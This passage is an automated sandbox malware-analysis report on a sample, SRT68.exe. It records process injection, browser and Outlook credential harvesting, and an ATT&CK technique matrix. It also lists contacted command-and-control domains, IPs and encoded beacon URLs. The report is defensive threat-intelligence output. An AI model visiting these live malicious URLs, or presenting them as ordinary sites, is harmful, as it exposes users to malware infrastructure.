                Source: SRT68.exe, VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: VdxisCThGA.exe, 00000003.00000002.3835088875.0000000001581000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000000.1410767579.0000000001580000.00000002.00000001.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1569922622.0000000001411000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC862B cpuid 0_2_00FC862B
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FD4E87
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FE1E06 GetUserNameW,0_2_00FE1E06
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FD3F3A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA49A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: SRT68.exeBinary or memory string: WIN_81
                Source: SRT68.exeBinary or memory string: WIN_XP
                Source: SRT68.exeBinary or memory string: WIN_XPe
                Source: SRT68.exeBinary or memory string: WIN_VISTA
                Source: SRT68.exeBinary or memory string: WIN_7
                Source: SRT68.exeBinary or memory string: WIN_8
                Source: SRT68.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01016283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_01016283
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01016747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01016747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568958 Sample: SRT68.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 28 www.avalanchefi.xyz 2->28 30 www.8600228.xyz 2->30 32 19 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 50 5 other signatures 2->50 10 SRT68.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 VdxisCThGA.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 odbcconf.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 VdxisCThGA.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 officinadelpasso.shop 195.110.124.133, 49718, 49719, 49720 REGISTER-ASIT Italy 22->34 36 appsolucao.shop 84.32.84.32, 49726, 49727, 49728 NTT-LT-ASLT Lithuania 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SRT68.exe50%ReversingLabsWin32.Trojan.AutoitInject
                SRT68.exe33%VirustotalBrowse
                SRT68.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                d48dk.top0%VirustotalBrowse
                www.avalanchefi.xyz0%VirustotalBrowse
                appsolucao.shop10%VirustotalBrowse
                www.cg19g5.pro0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.liveplah.live/2bf0/0%Avira URL Cloudsafe
                http://vpnto.net0%Avira URL Cloudsafe
                http://www.beythome.online/nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw==0%Avira URL Cloudsafe
                http://www.officinadelpasso.shop/io9k/0%Avira URL Cloudsafe
                https://www.bfyer.com?id=845620%Avira URL Cloudsafe
                https://whois7.ru0%Avira URL Cloudsafe
                http://www.kuyubak.online/0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHg0%Avira URL Cloudsafe
                https://ipaddress.ru0%Avira URL Cloudsafe
                http://www.appsolucao.shop/qize/100%Avira URL Cloudmalware
                http://www.vpnto.net/v3s3/0%Avira URL Cloudsafe
                http://www.d48dk.top/e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg0%Avira URL Cloudsafe
                http://www.kuyubak.online/0y4f/0%Avira URL Cloudsafe
                http://www.cg19g5.pro/n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug==0%Avira URL Cloudsafe
                http://www.amayavp.xyz/pxvi/100%Avira URL Cloudmalware
                http://www.i7.ru/0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/9qaj/0%Avira URL Cloudsafe
                http://www.remedies.pro/p9ni/0%Avira URL Cloudsafe
                http://www.fantastica.digital/5srj/0%Avira URL Cloudsafe
                http://www.vpnto.net/v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg0%Avira URL Cloudsafe
                http://www.liveplah.live/2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw==0%Avira URL Cloudsafe
                https://myssl.ru0%Avira URL Cloudsafe
                http://www.fantastica.digital0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g==0%Avira URL Cloudsafe
                https://i7.ru0%Avira URL Cloudsafe
                https://whois7.ru/?q=vpnto.net0%Avira URL Cloudsafe
                http://www.cg19g5.pro/n6mr/0%Avira URL Cloudsafe
                http://www.avalanchefi.xyz/vxa5/0%Avira URL Cloudsafe
                http://www.avalanchefi.xyz/vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ==0%Avira URL Cloudsafe
                https://i7.ru/domains/#domreg0%Avira URL Cloudsafe
                https://i7.ru/domains/0%Avira URL Cloudsafe
                http://www.beythome.online/nlsy/0%Avira URL Cloudsafe
                http://www.remedies.pro/p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g==0%Avira URL Cloudsafe
                http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg100%Avira URL Cloudmalware
                http://www.8600228.xyz/1aqh/0%Avira URL Cloudsafe
                https://proxyspot.com0%Avira URL Cloudsafe
                http://www.appsolucao.shop/qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg100%Avira URL Cloudmalware
                http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME100%Avira URL Cloudmalware
                https://job.i7.ru0%Avira URL Cloudsafe
                http://www.8600228.xyz/1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg0%Avira URL Cloudsafe
                http://www.d48dk.top/e60d/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.remedies.pro
                13.248.169.48
                truefalse
                  high
                  d48dk.top
                  154.23.184.207
                  truetrueunknown
                  www.avalanchefi.xyz
                  13.248.169.48
                  truetrueunknown
                  www.amayavp.xyz
                  185.27.134.144
                  truefalse
                    high
                    appsolucao.shop
                    84.32.84.32
                    truetrueunknown
                    www.cg19g5.pro
                    154.88.22.105
                    truetrueunknown
                    natroredirect.natrocdn.com
                    85.159.66.93
                    truefalse
                      high
                      www.fantastica.digital
                      194.58.112.174
                      truefalse
                        unknown
                        bagatowcannabis.cloud
                        81.2.196.19
                        truetrue
                          unknown
                          www.acond-22-mvr.click
                          199.59.243.227
                          truefalse
                            high
                            www.liveplah.live
                            209.74.77.107
                            truetrue
                              unknown
                              officinadelpasso.shop
                              195.110.124.133
                              truetrue
                                unknown
                                www.vpnto.net
                                91.226.30.3
                                truetrue
                                  unknown
                                  www.8600228.xyz
                                  103.249.106.91
                                  truetrue
                                    unknown
                                    www.officinadelpasso.shop
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.d48dk.top
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.beythome.online
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.kuyubak.online
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.bagatowcannabis.cloud
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.appsolucao.shop
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.liveplah.live/2bf0/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.appsolucao.shop/qize/true
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.kuyubak.online/0y4f/?dpy4vDKP=W6j3FlXHgKFEzHHMzzUr6etYN8emjbRukUVUnXhTbXIwJxcnvHf7UERkoV23CGr7af9sT9Hr2IGU+EAvarnr8GKkbF3NBPjLy540YzR1+jWjLh+mVAm2mD8qugDIDXe/9Q==&t8=erepa0aHgtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.beythome.online/nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.vpnto.net/v3s3/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.officinadelpasso.shop/io9k/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.cg19g5.pro/n6mr/?t8=erepa0aHg&dpy4vDKP=GPIQ2z/B9X5fmZ3sRaU3lKIswCsVIIIgTgvk25ZssZv4dO1E/pYASyJvrlPo9cI5+by0L1E1CSBOcK+TEfCDQZVXcl76FOzKxgwJ6LhevK7HHB5B6PysFKjeMQUdEOWzug==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.d48dk.top/e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHgtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.remedies.pro/p9ni/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.kuyubak.online/0y4f/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.liveplah.live/2bf0/?t8=erepa0aHg&dpy4vDKP=3OqiePSgEWDnichCzykulC99ilyMR42c9dvyS4flA69FHugFqZCdTRqO1AzR0oWb7uhSQNyMOpAGAvI21ypqYHnlFtq0XISmUzcVnvfhkgBzm7iBPlHVCbyp9E6MDtQhfw==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fantastica.digital/5srj/false
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.vpnto.net/v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHgtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.amayavp.xyz/pxvi/true
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.acond-22-mvr.click/9qaj/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.acond-22-mvr.click/9qaj/?t8=erepa0aHg&dpy4vDKP=caF4EcuODBgQ1i6gPG20EU6tn7+OYu3Aff5fuR7QYIa9oDxgmbqLqfUGksVeBOzK8iLLl5bd6dj0pUPLQhqCx4w42vP06UsMAFCvdgslU2ProEjwrqN2bmfrxuo1f5qv1g==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.cg19g5.pro/n6mr/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.avalanchefi.xyz/vxa5/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.avalanchefi.xyz/vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.remedies.pro/p9ni/?t8=erepa0aHg&dpy4vDKP=VjnXICZu3b90kzFmF4J2uYgo+ABl9xxhLCOJTOlpSNjw/vdOvc7wLSvxn4RRbS+FrV68iTOjdPHrV90Y9IBOFprvjVYeP8iCfChMm+NPXe6TXixkrzJc8c2KgZmEDZ5g3g==true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.beythome.online/nlsy/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHgtrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.8600228.xyz/1aqh/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.appsolucao.shop/qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHgtrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://www.8600228.xyz/1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHgtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.d48dk.top/e60d/true
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabodbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ipaddress.ruodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://whois7.ruodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://vpnto.netodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.bfyer.com?id=84562odbcconf.exe, 00000004.00000002.3836668787.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003326000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.comodbcconf.exe, 00000004.00000002.3836668787.00000000064B4000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003E24000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchodbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.i7.ru/odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://myssl.ruVdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fantastica.digitalVdxisCThGA.exe, 00000006.00000002.3837691374.0000000005242000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoodbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://i7.ruVdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://whois7.ru/?q=vpnto.netodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
